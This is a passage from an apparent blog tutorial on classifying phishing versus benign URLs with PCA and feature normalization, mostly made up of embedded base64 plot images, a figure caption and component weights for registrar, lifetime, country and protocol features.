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" /></div>
</div>
<div>
<div style="text-align: center;">
<i>Figure 2.</i> Visualization of URLs in the two-dimensional space after applying the PCA technique with <i>Lifetime_new := Lifetime * 100</i> (phishing links - orange dots, benign links - blue dots).</div>
<div>
<br /></div>
</div>
<div>
In practice, when we have features of different scale it is recommended to perform feature normalization so they have a similar scale. In a simple case, we can divide a feature value by the max value or range, but more popular techniques are <i>min-max</i> and <i>mean normalizations</i> (see <a href="https://en.wikipedia.org/wiki/Feature_scaling">Feature scaling</a> for more methods).</div>
<div>
<div>
<br />
After min-max feature normalization, we'll obtain the following picture.<br />
<ul style="text-align: left;">
<li><i>Component 1</i>: -0.348 x Registrar_code + 0.271 x Lifetime + 0.069 x Country_code + <b>0.895 x Protocol_code</b></li>
<li><i>Component 2</i>: -0.258 x Registrar_code + 0.020 x Lifetime + <b>-0.965 x Country_code</b> + -0.032 x Protocol_code </li>
</ul>
</div>
<div>
<div style="text-align: center;">
<img src="data:image/png;base64,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